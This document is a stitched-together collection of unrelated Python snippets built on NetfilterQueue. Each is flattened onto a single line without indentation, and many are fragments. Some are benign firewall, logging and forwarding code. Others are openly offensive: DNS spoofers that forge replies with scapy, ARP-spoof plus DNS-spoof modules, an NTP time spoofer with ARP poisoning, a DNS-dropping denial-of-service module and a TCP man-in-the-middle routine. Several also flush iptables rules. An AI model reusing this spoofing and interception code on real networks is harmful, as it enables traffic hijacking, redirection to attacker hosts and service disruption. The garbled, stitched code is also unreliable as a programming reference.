class PacketFilter: def __init__(self, filter): self.filter = filter def start(self): set_ip_forwarding(1) iptables().NFQUEUE() self.nfqueue = NetfilterQueue() self.nfqueue.bind(1, self.modify) t = threading.Thread(name='packetparser', target=self.nfqueue.run) t.setDaemon(True) t.start() def modify(self, pkt): #log.debug("Got packet") data = pkt.get_payload() packet = IP(data) try: execfile(self.filter) except Exception: log.debug("Error occurred in filter") print_exc() pkt.set_payload(str(packet)) #set the packet content to our modified version pkt.accept() #accept the packet def stop(self): self.nfqueue.unbind() set_ip_forwarding(0) iptables().flush()
def main(): global SERVER_IP, SERVER_PORT from netfilterqueue import NetfilterQueue argument_parser = argparse.ArgumentParser() argument_parser.add_argument('--log-file') argument_parser.add_argument('--log-level', choices=['INFO', 'DEBUG'], default='INFO') argument_parser.add_argument('--queue-number', default=0, type=int) argument_parser.add_argument('server', help='x.x.x.x:19842') args = argument_parser.parse_args() log_level = getattr(logging, args.log_level) logging.getLogger().setLevel(log_level) logging.getLogger().handlers = [] if args.log_file: handler = logging.handlers.RotatingFileHandler( args.log_file, maxBytes=1024 * 16, backupCount=0) handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s %(message)s')) handler.setLevel(log_level) logging.getLogger().addHandler(handler) handler = logging.StreamHandler() handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s %(message)s')) handler.setLevel(log_level) logging.getLogger().addHandler(handler) signal.signal(signal.SIGTERM, lambda signum, fame: os._exit(1)) signal.signal(signal.SIGINT, lambda signum, fame: os._exit(1)) SERVER_IP, SERVER_PORT = args.server.split(':') SERVER_PORT = int(SERVER_PORT) nfqueue = NetfilterQueue() nfqueue.bind(args.queue_number, handle_nfqueue_element) LOGGER.info('fquni client started') nfqueue.run()
class Jam(object): name = "Denial of Service Module." desc = "Denial of service attacks here." version = "0.1" ps = "Need to add more DoS attacks." def __init__(self): self.blocks = [] def mitmdropstart(self, host): os.system("iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1") self.host = host try: print "[+] Man-in-the-middle DNS drop initialized." self.t = threading.Thread(name="mitmdrop", target=self.filter) self.t.setDaemon(True) self.t.start() except Exception as e: print "[!] Exception caught: {}".format(e) def mitmdropstop(self): os.system("iptables -t nat -D PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1") print "[-] Man-in-the-middle DNS drop finalized." def callback(self, packet): packet.drop() def filter(self): try: self.q = NetfilterQueue() self.q.bind(1, self.callback) self.q.run() except Exception as e: print "[!] Exception caught: {}".format(e)
def handle_nfqueue(): try: nfqueue = NetfilterQueue() nfqueue.bind(3, handle_packet) nfqueue.run() except: LOGGER.exception('stopped handling nfqueue')
def __init__(self, nfq_number): """ We use mark that will be equal to path_id """ self.nfq_number = nfq_number self.nfqueue = NetfilterQueue() self.tun_params_transformer = NfqTunnelParamsTransformer() self.__reset()
def start(self): set_ip_forwarding(1) iptables().NFQUEUE() self.nfqueue = NetfilterQueue() self.nfqueue.bind(0, self.modify) self.nfqueue.run()
def handle_nfqueue(): try: nfqueue = NetfilterQueue() nfqueue.bind(1, handle_packet) nfqueue.run() except: LOGGER.exception('stopped handling nfqueue') dns_service_status.error = traceback.format_exc()
def __init__(self): self.captured_packets = list() self.runing = False self.nfqueue = NetfilterQueue() self.nfqueue.bind(1, self.tamper, mode=COPY_PACKET) self.qworker = NFQController(self.nfqueue) self.directory = "iptables-backup" self.backup = "backup" self.handler = Packet_handler()
def main(self): try: self.q = NetfilterQueue() self.q.bind(0, self.callback) self.q.run() except KeyboardInterrupt: self.stop() except Exception as error: print('[-] Exception {error}'.format(error=error))
def __init__(self): self.captured_packets = list() self.runing = False self.nfqueue = NetfilterQueue() self.nfqueue.bind(1, self.preprocesing_packets, mode=COPY_PACKET) self.qworker = NFQController(self.nfqueue) self.directory = "iptables-backup" self.backup = "backup" self.http_sessions = {}
def handle_nfqueue(): try: nfqueue = NetfilterQueue() nfqueue.bind(3, handle_packet) nfqueue.run() except: LOGGER.exception('stopped handling nfqueue') finally: LOGGER.info('full proxy service stopped')
def __init__(self, params, conf): super(NetQueue, self).__init__() self.counter = 0 self.q = NetfilterQueue() self.q.bind(1, self.cb) self.params = params self.params.conf = conf self.DNSworker = DNSproxy(self.params) self.HTTPworker = HTTPproxy(self.params)
def setupFilter(): nfqueue = NetfilterQueue() #1 is the iptabels rule queue number, filter is the callback function nfqueue.bind(1, filter) try: print "[*] waiting for data" nfqueue.run() except KeyboardInterrupt: pass
def run(self): # print '\n\t I am running ' self.nfqueue = NetfilterQueue() # 2.Bind the nfqueue on the nfqueue 1 # For each packet in the queue, check whether there are keywords, if yes, make change accordingly, if no, pass it through self.nfqueue.bind(1, self.check_and_change) self.queueT = threading.Thread(target=self.nfqueue.run) self.queueT.daemon = True self.queueT.start()
def __init__(self): self.lock = Lock() self.rules = Rules() self.dns = DNSCollector() self.q = NetfilterQueue() self.procmon = ProcMon() self.qt_app = QtApp() self.q.bind(0, self.pkt_callback, 1024 * 2)
def debug(): nfqueue = NetfilterQueue() # nfqueue.bind(1, print_and_accept) nfqueue.bind(1, snoop) try: nfqueue.run() except Exception,e: logger.error("Error in Snoop start: %s" % str(e)) logger.error(traceback.format_exc())
def toggleIntercept(self): if (self.intercepting is False): self.nfqueue = NetfilterQueue() self.nfqueue.bind(1, self.display) self.intercepting = True print("Interception has been turned on.") else: self.nfqueue.unbind() print("Inteception has been turned off.") self.intercepting = False
def handle_nfqueue(): try: nfqueue = NetfilterQueue() nfqueue.bind(2, handle_packet) nfqueue.run() except: LOGGER.exception('stopped handling nfqueue') tcp_service_status.error = traceback.format_exc() finally: LOGGER.info('tcp service stopped')
def start(self): set_ip_forwarding(1) iptables().NFQUEUE() self.nfqueue = NetfilterQueue() self.nfqueue.bind(1, self.modify) t = threading.Thread(name='packetparser', target=self.nfqueue.run) t.setDaemon(True) t.start()
def __init__(self, version): self.nfqueue = NetfilterQueue() self.queue_num = None if version == 4: self.table = iptc.Table self.rule = iptc.Rule elif version == 6: self.table = iptc.Table6 self.rule = iptc.Rule6 self.rule_inserted = False
def __init__(self, database): self.lock = Lock() self.rules = Rules(database) self.dns = DNSCollector() self.q = NetfilterQueue() self.procmon = ProcMon() self.qt_app = QtApp() self.desktop_parser = LinuxDesktopParser() self.q.bind(0, self.pkt_callback, 1024 * 2)
def _run_nfqueue(self): self.nfqueue = NetfilterQueue() self.nfqueue.bind(self.queue_num, self._process_pkt) try: self._debug("bind to queue #{0}".format(self.queue_num)) self.nfqueue.run() except KeyboardInterrupt: self._debug("No.%s nfqueue stops.", self.queue_num) self.nfqueue.unbind() self.nfqueue = None
def main(): global quitting setup(NUM_SLOTS) logging.getLogger("scapy.runtime").setLevel(logging.ERROR) timeout_thread = threading.Thread(target=timeout_thread_runner) timeout_thread.daemon = True timeout_thread.start() honeypot_thread = threading.Thread(target=honeypot_thread_runner) honeypot_thread.daemon = True honeypot_thread.start() nfqueue = NetfilterQueue() nfqueue.bind(1, on_packet_received) s = socket.fromfd(nfqueue.get_fd(), socket.AF_UNIX, socket.SOCK_STREAM) try: nfqueue.run_socket(s) except KeyboardInterrupt: print('') quitting = True s.close() nfqueue.unbind()
def do_mitm(self): """ Performs the man-in-the-middle attack. This function is blocking. """ try: # Add necessary IP table entries. self.log("Updating IP tables...") system("iptables -A INPUT -d {} -p tcp -j NFQUEUE --queue-num {}". format(self.ip, self.queue_number)) system("iptables -A OUTPUT -s {} -p tcp -j NFQUEUE --queue-num {}". format(self.ip, self.queue_number)) # Bind to filter queue. nfqueue = NetfilterQueue() nfqueue.bind(self.queue_number, self.packet_callback) s = socket.fromfd(nfqueue.get_fd(), socket.AF_UNIX, socket.SOCK_STREAM) try: self.log("Running MITM...") nfqueue.run_socket(s) except KeyboardInterrupt: pass self.log("Closing sockets...") s.close() nfqueue.unbind() finally: # Remove IP table entries. self.log("Restoring IP tables.") system("iptables -D INPUT 1") system("iptables -D OUTPUT 1")
def run(self): try: while (self.running): nfqueue = NetfilterQueue() nfqueue.bind(1, self.handle_pkt) nfqueue.run() except Exception as e: self.logger.error(RED+'NetFilter Failed: '+str(e))
def main(): nfqueue = NetfilterQueue() nfqueue.bind(1, process) try: nfqueue.run() except: print("Exiting...") # iptables reset sys.exit(1)
def run(self): # This is the intercept q = NetfilterQueue() q.bind(1, self.callback) t = threading.Thread(target=self.__run_threaded, args=(q,)) t.daemon = True t.start() while not self.event.is_set(): self.configurator() print("DNSspoofer finishing!") q.unbind()
def __init__(self, queue_id, args): self.__nfqueue = NetfilterQueue() self.__nfqueue.bind(queue_id, self.__cb) self.__pktlist = [] self.__only_req = args['--req'] self.__only_res = args['--res'] self.__host = args['--host'] self.__dst = args['--dst'] self.__src = args['--src'] self.__socket = socket.fromfd(self.__nfqueue.get_fd(), socket.AF_UNIX, socket.SOCK_STREAM)
def nfqueue_app(self): open(".term.txt", 'w').close() self.nfqueue = NetfilterQueue() self.nfqueue.bind(0, self.print_and_accept) self.socket = socket.fromfd(self.nfqueue.get_fd(), socket.AF_UNIX, socket.SOCK_STREAM) try: self.nfqueue.run_socket(self.socket) except KeyboardInterrupt: print('') socket.close() self.nfqueue.unbind()
def __init__(self, subdomain, local_ip): global monitor_domain, server_ip monitor_domain = str(subdomain) server_ip = local_ip self.enable_dns_forwarding() self.nfqueue = NetfilterQueue() self.nfqueue.bind(1, packet_handler) thread = Thread(target=self.start_monitoring, args=(self, )) thread.start() atexit.register(self.on_shutdown, self) print("[+] Started DNS Spoofer thread.")
def handle_nfqueue(queue_number): from netfilterqueue import NetfilterQueue while True: try: nfqueue = NetfilterQueue() nfqueue.bind(queue_number, handle_packet) LOGGER.info('handling nfqueue at queue number %s' % queue_number) nfqueue.run() except: LOGGER.exception('failed to handle nfqueue') return finally: LOGGER.info('stopped handling nfqueue')
def main(): nfqueue = NetfilterQueue() nfqueue.bind(1, print_and_accept) s = socket.fromfd(nfqueue.get_fd(), socket.AF_UNIX, socket.SOCK_STREAM) try: nfqueue.run_socket(s) except: print('') s.close() nfqueue.unbind()
class InvalidPacketsFilter(object): def __init__(self): self._nfqueue = NetfilterQueue() def filterPackets(self, packet): #scapy_packet = IP(packet.get_payload()) #print " -------- INIZIO PACCHETTO --------\n\n\n" #print scapy_packet.show() #print "\n\n\n -------- FINE PACCHETTO --------\n\n\n" packet.accept() def monitoredTermination(self, signal_number, interrupted_frame): self._nfqueue.unbind() #system("su daniele -c \"notify-send \\\"Invalid packets filter status changed\\\" \\\"Stopped\\\"\"") exit(0) def start(self): self._nfqueue.bind(2, self.filterPackets) #system("su daniele -c \"notify-send \\\"Invalid packets filter status changed\\\" \\\"Started\\\"\"") signal(SIGTERM, self.monitoredTermination) self._nfqueue.run() def stop(self): self._nfqueue.unbind() #system("su daniele -c \"notify-send \\\"Invalid packets filter status changed\\\" \\\"Stopped\\\"\"") exit(0)
def main(): print("Interface: " , interface, "\nHostnames: ", hostnames) print("\nEnabling promiscuous mode") set_promiscuous_mode(interface, True) set_ip_forward(True) # sniff(iface=interface, filter="udp and port 53", prn = sniff_dns, store=0) sniffer = NetfilterQueue() sniffer.bind(1, sniff_dns) try: os.system("sudo systemd-resolve --flush-caches") os.system("sudo iptables -A INPUT -i %s -p udp --sport 53 -j NFQUEUE --queue-num 1" %(interface)) os.system("sudo iptables -A OUTPUT -p udp --dport 53 -j NFQUEUE --queue-num 1") print("\n\t ===> DNS Injection Running <===") sniffer.get_fd() sniffer.run() except KeyboardInterrupt: os.system("sudo iptables -F") print("\n\t ===> DNS Injection Interupted <===") print("\n Disabling promiscuous mode") set_promiscuous_mode(interface, False) set_ip_forward(False)
def main(queue_num): open("database.json", 'a', os.O_NONBLOCK) open("log.txt", 'a', os.O_NONBLOCK) if os.stat("database.json").st_size == 0: open("database.json", "w").write("{}") global database_filename, total_packets, packet_accepted database_filename = "database.json" total_packets = 0 packet_accepted = 0 #making queue and assigning callback nfqueue = NetfilterQueue(max_len=10000) nfqueue.bind(queue_num, cb) print("Started Firewall .... ") #calling on each packet arrival try: nfqueue.run() except KeyboardInterrupt: print ("Keyboard Interrupt") #ending of program nfqueue.unbind() print("Queue Closed\n") print( "STATISTICS\n\tTotal Packets :: {}\n\tPackets Accepted :: {}\n\tPackets Dropped :: {}" .format(total_packets, packet_accepted, total_packets - packet_accepted))
def main(): try: iptables_cmd = 'iptables -t raw -A PREROUTING -p tcp --dport ' + args.port + ' -j NFQUEUE --queue-num 1' cmd = os.system(iptables_cmd) print("[+] Setting IpTables rules") if cmd != 0: print("[-] setting iptables failed, exiting!") quit() #create NetfilterQueue object nfqueue = NetfilterQueue() nfqueue.bind(1, callback) print("[+] Waiting for data...") print("[+] Accepting only from", args.source, "port", args.port) nfqueue.run() except KeyboardInterrupt: print("[+] Restoring iptables") #restore iptables os.system("iptables -F -t raw") print('[+] Exiting') nfqueue.unbind()
def main(argv): if len(argv) < 3: print('netfilter.py queuenum host port') exit(s) qnum = int(argv[0]) host = argv[1] port = int(argv[2]) try: print host print port s.settimeout(40) s.connect((host, port)) print('NAT Server found') except Exception as e: print("No NAT found") exit(s) nfqueue = NetfilterQueue() nfqueue.bind(qnum, handle_packet) FORMAT = '%(asctime)-15s %(message)s' logging.basicConfig(filename='filtertimes.log', level=logging.DEBUG, format=FORMAT) logging.info("NEW TRIAL") try: print 'RUNNING QUEUE' nfqueue.run() except KeyboardInterrupt: print 'Stopped' nfqueue.unbind() exit(s)
def start_server_com(): server = NetfilterQueue() server.bind(1, server_stream) try: server.run() except KeyboardInterrupt: server.unbind()
class DnsSpoofNetFilter(object): def __init__(self): """ implementation Dnsspoof with Netfilterqueue modules""" description = "Module DNS spoofing v0.1" usage = "Usage: use --help for futher information" parser = argparse.ArgumentParser(description = description, usage = usage) parser.add_argument('-d','--domains', dest = 'domains', help = 'Specify the domains', required = True) parser.add_argument('-r', '--redirect', dest = 'redirect', help = 'Redirect host ', required = True) self.args = parser.parse_args() def logggingCreate(self): setup_logger('dnsspoofAP', './logs/AccessPoint/dnsspoof.log') self.logDNS = logging.getLogger('dnsspoofAP') self.logDNS.info('Dns Spoof: running...') def callback(self,packet): payload = packet.get_payload() pkt = IP(payload) if not pkt.haslayer(DNSQR): packet.accept() else: if pkt[DNS].qd.qname[:len(str(pkt[DNS].qd.qname))-1] in self.domain: self.logDNS.info('{} ->({}) has searched for: {}'.format(pkt[IP].src, self.redirect,pkt[DNS].qd.qname[:len(str(pkt[DNS].qd.qname))-1])) spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\ an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=self.redirect)) packet.set_payload(str(spoofed_pkt)) send(spoofed_pkt,verbose=False) packet.accept() elif len(self.domain) == 1 and self.domain[0] == '': self.logDNS.info('{} ->({}) has searched for: {}'.format(pkt[IP].src, self.redirect,pkt[DNS].qd.qname[:len(str(pkt[DNS].qd.qname))-1])) spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\ an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=self.redirect)) packet.set_payload(str(spoofed_pkt)) send(spoofed_pkt,verbose=False) packet.accept() else: packet.accept() def main(self): self.redirect, self.domain = self.args.redirect, self.args.domains.split(',') self.q = NetfilterQueue() self.logggingCreate() self.q.bind(0, self.callback) self.q.run()
def initialize(self, result): if platform.system() == "Darwin": pass else: os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1') global domain global localIP localIP = self.config["poisoned_ip"] domain = self.config["domain"] self.running = True if platform.system() == "Darwin": thread = threading.Thread(target=self.dns_sniffer) thread.start() thread.join() else: global queue from netfilterqueue import NetfilterQueue queue = NetfilterQueue() queue.bind(1, self.callback) try: queue.run() # Main loop except KeyboardInterrupt: queue.unbind() # os.system('iptables -F') # os.system('iptables -X') return
class Dns_spoof: def __init__(self, dnsdict, queueNum=1, verbose=True): self.dnsdict = dnsdict self.queueNum = queueNum self.queue = NetfilterQueue() self.verbose = verbose def __call__(self): print("[*] starting DNS Spoofing") os.system("iptables -I FORWARD -j NFQUEUE --queue-num %s"%self.queueNum) self.queue.bind(self.queueNum, self.intercept_linux) try: self.queue.run() except KeyboardInterrupt: print("\n[*] Ctl+C pressed, Stoping DNS spoofing...") os.system("iptables -D FORWARD -j NFQUEUE --queue-num %s"%self.queueNum) print("[!] iptables restaured!!! ") print("[!] DNS spoof stopped!!!") def transform_packet(self, packet): qname = packet[DNSQR].qname if qname not in self.dnsdict: return packet packet[DNS].an = DNSRR(rrname=qname, rdata=self.dnsdict[str(qname)[2:-1]]) packet[DNS].ancount = 1 del packet[IP].len del packet[IP].chksum del packet[UDP].len del packet[UDP].chksum return packet def intercept_linux(self, packet): scapypacket = IP(packet.get_payload()) if scapypacket.haslayer(DNSRR) and self.verbose: print("[+] Original packet %s"%scapypacket.summary()) try: scapypacket = self.transform_packet(scapypacket) except IndexError: pass print("[+] New packet %s"%scapypacket.summary()) packet.set_payload(bytes(scapypacket)) elif scapypacket.haslayer(DNSRR) and not self.verbose: try: scapypacket = self.transform_packet(scapypacket) except IndexError: pass packet.set_payload(bytes(scapypacket)) return packet.accept()
def main(argv) : global logger filename = os.path.join( BASEDIR, TARGET_FILE ) load_blacklist(filename) print( '#### START ####' ) sys.stdout.flush() setup() logger = Logger("/var/log/pfloyd.log", False) event_handler = ChangeHandler() observer = Observer() observer.schedule(event_handler,BASEDIR,recursive=True) observer.start() nfqueue = NetfilterQueue() nfqueue.bind(1, netblocker) try: nfqueue.run() except KeyboardInterrupt: observer.stop() print('') nfqueue.unbind() observer.join()
def run(self): self.args() self.log('Starting') ######### MAIN CODE ########### # Iptables rule for NTP packets os.system( 'iptables -t raw -A PREROUTING -p udp --sport 123 -j NFQUEUE --queue-num 20' ) # Filter packets nfqueue = NetfilterQueue() #20 is the iptables rule queue number nfqueue.bind(20, self.manipulate) try: self.log("[!] Waiting for NTP packages to spoof (Year = " + str(self.year) + " )") nfqueue.run() except Exception as e: self.log("[!] [FAIL] Failed to start NetFilterQueue : " + e) sys.exit(1) finally: nfqueue.unbind() #p.terminate() os.system('iptables -F -vt raw') ############################### self.finish(True)
def run(): if importerror == True: printError("Netfilterqueue is not imported!") print("Traceback:\n" + str(error)) return controller.reset() printInfo("Loading host list...") try: hostfile = open(getpath.conf() + "hosts", "r").read() except FileNotFoundError: printError("Host list is not found!") return except PermissionError: printError("Permission denied!") for line in hostfile.splitlines(): if "#" not in line and len(line.split()) == 2: hostlist.append(line.split()) for item in hostlist: try: item[0] = item[0].encode() except AttributeError: pass try: item[1] = item[1].encode() except AttributeError: pass if variables["arp_spoof"][0] == "true": printInfo("IPv4 forwarding...") os.system('echo "1" >> /proc/sys/net/ipv4/ip_forward') printInfo("Starting ARP spoof...") arpspoof = ArpSpoofer(variables["router"][0], variables["target"][0], controller) arpspoof.start() printInform("Ctrl-C to stop.") os.system( 'iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1' ) try: q = NetfilterQueue() q.bind(1, callback) try: q.run() except KeyboardInterrupt: controller.kill = True q.unbind() os.system('iptables -F') os.system('iptables -X') printInform("DNS spoof stopped.") except: printError("Unexcepted error:\n") traceback.print_exc(file=sys.stdout) controller.kill = True if variables["arp_spoof"][0] == "true": printInfo("Stopping ARP spoof...") arpspoof.join()
def start_snoop(ilist,qname="NFQUEUE",qval=1): for interface in ilist: # if the host is the destination (to forward above ip) subprocess.call("sudo iptables -I INPUT -i eth%s -j %s --queue-num %s"\ % (interface,qname,int(qval))) # our base station should use this subprocess.call("sudo iptables -I FORWARD -i eth%s -j %s --queue-num %s"\ % (interface,qname,int(qval))) nfqueue = NetfilterQueue() nfqueue.bind(qval, snoop) try: nfqueue.run() except Exception,e: logger.error("Error in Snoop start: %s" % str(e))
def of_forward_func(): ''' q = nfqueue.queue() q.open() q.bind(socket.AF_INET) q.set_callback(pkt_modify) q.create_queue(1) ''' nfq = NetfilterQueue() nfq.bind(1, pkt_filter_callback) cmd = 'iptables -t mangle -I PREROUTING -i eth1 -p tcp --dport 6633 -j NFQUEUE --queue-num 1' subprocess.call(cmd, shell=True, stdout=subprocess.PIPE) cmd = 'ip rule add fwmark 30 table of_forward' subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) cmd = 'ip route add default dev tun0 table of_forward' subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) cmd = 'iptables -t nat -I POSTROUTING -o tun0 -j MASQUERADE' subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) cmd = 'sysctl -w net.ipv4.conf.tun0.rp_filter=2' subprocess.call(cmd, stdout=subprocess.PIPE, shell=True) try: print 'OF forward mode - Starting to forwarding Openflow packet' nfq.run() except KeyboardInterrupt: print 'Quitting Openflow packet forward mode' cmd = 'iptables -t mangle -D PREROUTING 1' subprocess.call(cmd, stdout=subprocess.PIPE, shell=True) cmd = 'ip rule del table of_forward' subprocess.call(cmd, stdout=subprocess.PIPE, shell=True) cmd = 'ip route flush table of_forward' subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True) cmd = 'iptables -t nat -D POSTROUTING 1' subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True) return
def setup_NFQ(self, handler, queue): self.nfq = NFQ(queue) self.nfq.bind(queue, handler) self.nfq_fd = self.nfq.get_fd() self.nfq_socket = socket.fromfd(self.nfq_fd, \ socket.AF_UNIX, socket.SOCK_STREAM) self.nfq_socket.setblocking(False)
def packet_collector(self): """ Main NFQ related method. Configure the queue (if available) and wait for packets. NOTE: NetfilterQueue.run() blocs! """ if not NFQ_AVAILABLE: logger.error('Classifier can\'t start\n\n' '*** NetfilterQueue not supported or installed ***\n') return try: self.nfq = NetfilterQueue() logger.info('Binding to NFQ queue number "%s"', NFQ_NUMBER) self.nfq.bind(NFQ_NUMBER, self.process_packet) except: msg = ('Failed to bind to the NFQ queue number "%s". ' 'HINT: try to run command `sudo iptables -L` to check if ' 'the required queue is available.' % NFQ_NUMBER) logger.exception(msg) raise try: logger.info('Starting NFQ - waiting for packets ...') self.nfq.run() except: logger.exception('Failed to start NFQ') raise
def spoof(self): try: self.q = NetfilterQueue() self.q.bind(1, self.callback) self.q.run() except Exception as e: print "[*] Exception caught: {}".format(e)
def __init__(self, queue_number): self.hsts = False self.dns = False self.dnscfg = None self.hstscfg = None self.queue_number = queue_number self.nfqueue = NetfilterQueue()
def start(self): set_ip_forwarding(1) iptables().NFQUEUE() self.nfqueue = NetfilterQueue() self.nfqueue.bind(1, self.modify) self.nfqueue.run()
def main(argv): spoofer = NTPSpoof() spoofer.getCommandlineOpts(argv) print "[===>] Using %s interface" % spoofer.interface # trying to resolve gateway mac spoofer.gateway_mac = spoofer.getMac(spoofer.gateway_ip) if spoofer.gateway_mac is None: print "[ERROR] Couldn't receive gateway MAC." sys.exit() else: print "[===>] Gatway: IP=%s | MAC=%s " % (spoofer.gateway_ip, spoofer.gateway_mac) # trying to resolve target mac spoofer.target_mac = spoofer.getMac(spoofer.target_ip) if spoofer.target_mac is None: print "[ERROR] Couldn't receive target MAC." sys.exit() else: print "[===>] Target: IP=%s | MAC=%s " % (spoofer.target_ip, spoofer.target_mac) # start poisoning in different thread poison_thread = threading.Thread(target = spoofer.poisonTarget) poison_thread.start() # put incoming ntp-replies into a queue for manipulation print "[===>] Setting iptables for queuing" os.system('iptables -A FORWARD -j NFQUEUE --queue-num 1') # create netfilterqueue interface and bind to nfqueue #1 nfqueue = NetfilterQueue() nfqueue.bind(1,spoofer.callback) try: # run queue nfqueue.run() except KeyboardInterrupt: # unbind nfqueue and reset iptables print "[===>] Resetting iptables" nfqueue.unbind() os.system('iptables -F') finally: # stop poisoning and wait for thread POISON = False time.sleep(2) # restore after poisoning print "[===>] Restoring targets ARP-Cache" spoofer.restoreTarget() sys.exit()
def main(self): try: self.q = NetfilterQueue() self.q.bind(0,self.callback) self.q.run() except KeyboardInterrupt: self.stop() except Exception as error: print('[-] Exception {error}'.format(error=error))
def cmd_watch(args): # pylint: disable=W0613 print "\tExample: curl localhost" def print_and_accept(pkt): pkt.accept() data = pkt.get_payload() m = re.compile("(GET|POST)(.*)", re.DOTALL).search(data) if not m: print "??", "".join(re.findall("[ -_]+", data)) return print m.group(1) + m.group(2) nfqueue = NetfilterQueue() nfqueue.bind(args.nfqueue, print_and_accept) try: nfqueue.run() except KeyboardInterrupt: print
def main(id): """ _payload = "0"*1500 while True: PIPEOUT.write(_payload.zfill(2048)) PIPEOUT.flush() print "%i--------------" %(len(_payload.zfill(2048))) time.sleep(1) """ try: nfqueue = NetfilterQueue() nfqueue.bind(id + 1, get_packet, max_len=50000) while True: nfqueue.run() except Exception, err: print "Error on binding NF_QUEUE: %s" % str(err) sys.exit(1)
def run(): if importerror == True: printError("netfilterqueue isn't imported") printInfo("install the dependencies and reload this module") print("traceback:\n"+str(error)) return controller.reset() printInfo("loading host list...") try: hostfile = open(getpath.conf()+"hosts", "r").read() except FileNotFoundError: printError("host list not found") return except PermissionError: printError("permission denied") for line in hostfile.splitlines(): if "#" not in line and len(line.split()) == 2: hostlist.append(line.split()) for item in hostlist: try: item[0] = item[0].encode() except AttributeError: pass try: item[1] = item[1].encode() except AttributeError: pass if variables["arp_spoof"][0] == "true": printInfo("ipv4 forwarding...") os.system('echo "1" >> /proc/sys/net/ipv4/ip_forward') printInfo("starting arp spoof...") arpspoof = ArpSpoofer(variables["router"][0], variables["target"][0], controller) arpspoof.start() printInfo("ctrl + c to end") os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1') try: q = NetfilterQueue() q.bind(1, callback) try: q.run() except KeyboardInterrupt: controller.kill = True q.unbind() os.system('iptables -F') os.system('iptables -X') printInfo("dns spoof ended") except: printError("unexcepted error:\n") traceback.print_exc(file=sys.stdout) controller.kill = True if variables["arp_spoof"][0] == "true": printInfo("stopping arp spoof") arpspoof.join()
def full_forward_func(): nfq = NetfilterQueue() nfq.bind(1, pkt_filter_callback) cmd = 'iptables -t mangle -I PREROUTING -i eth1 -j NFQUEUE --queue-num 1' subprocess.call(cmd, shell=True, stdout=subprocess.PIPE) cmd = 'ip rule add fwmark 10 table full_forward' subprocess.call(cmd, stdout=subprocess.PIPE, shell=True) cmd = 'ip route add default dev tun0 table full_forward' subprocess.call(cmd, stdout=subprocess.PIPE, shell=True) cmd = 'iptables -t nat -I POSTROUTING -o tun0 -j MASQUERADE' subprocess.call(cmd, stdout=subprocess.PIPE, shell=True) cmd = 'sysctl -w net.ipv4.conf.tun0.rp_filter=2' subprocess.call(cmd, stdout=subprocess.PIPE, shell=True) try: print print 'Full forward mode - Starting to forwarding every packet' nfq.run() except KeyboardInterrupt: print print 'Quitting full forward mode' #nfq.unbind() cmd = 'iptables -t mangle -D PREROUTING 1' subprocess.call(cmd, stdout=subprocess.PIPE, shell=True) cmd = 'ip rule del table full_forward' p1 = subprocess.call(cmd, stdout=subprocess.PIPE, shell=True) cmd = 'ip route flush table full_forward' p2 = subprocess.call(cmd, stdout=subprocess.PIPE, shell=True) cmd = 'iptables -t nat -D POSTROUTING 1' p3 = subprocess.call(cmd, stdout=subprocess.PIPE, shell=True) return
def main(): nfqueue = NetfilterQueue() nfqueue.bind(args.queue_num, process) iptables_setup_cmd = "iptables -A OUTPUT -p udp --dport 53 -j NFQUEUE --queue-num %s" % args.queue_num iptables_clear_cmd = "iptables -D OUTPUT -p udp --dport 53 -j NFQUEUE --queue-num %s" % args.queue_num try: if subprocess.call(iptables_setup_cmd, shell=True) == 0: print((color.GREEN + "[*] Executing : '%s'" + color.END) % iptables_setup_cmd) print(color.GREEN + "[*] Running" + color.END) nfqueue.run() else: print(color.RED + "[!]Could not iptables configuration..." + color.END) sys.exit(1) except: print(color.GREEN + "[*] Exiting..." + color.END) print((color.GREEN + "[*] Executing : '%s'" + color.END) % iptables_clear_cmd) subprocess.call(iptables_clear_cmd, shell=True) sys.exit(1)